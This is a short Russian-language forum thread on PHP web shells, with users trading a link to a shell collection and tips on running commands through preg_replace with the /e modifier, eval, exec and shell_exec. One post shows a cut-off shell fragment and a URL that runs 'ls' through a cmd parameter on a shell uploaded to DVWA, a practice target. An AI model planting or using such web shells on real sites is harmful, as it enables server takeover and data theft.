Мыслишь в верную сторону, только скрипту этому... боюсь считать годы
Как ты его в интернете не нашел - просто удивительно
Если интереснен PHP + безопасность. Вот подборка PHP шеллов, изучай:

https://github.com/JohnTroony/php-webshells

Более универсальнее preg_replace ещё не видел.
Можно использовать eval\passthru\exec\shell_exec\...., но preg_replace всех победит!

&1'); ?>
и потом выполняем команды через cmd
IP/dvwa/hackable/uploads/shell.php?cmd=ls

centr сказал(а):

но preg_replace всех победит!


Наверное... Если искать сайты с версией php, поддерживающей модификатор e в указанной функции.


Necr0s сказал(а):

&1'); ?>
и потом выполняем команды через cmd
IP/dvwa/hackable/uploads/shell.php?cmd=ls


И чем этот вариант отличается от предложенного в стартовом посте?
Поменяли e на cmd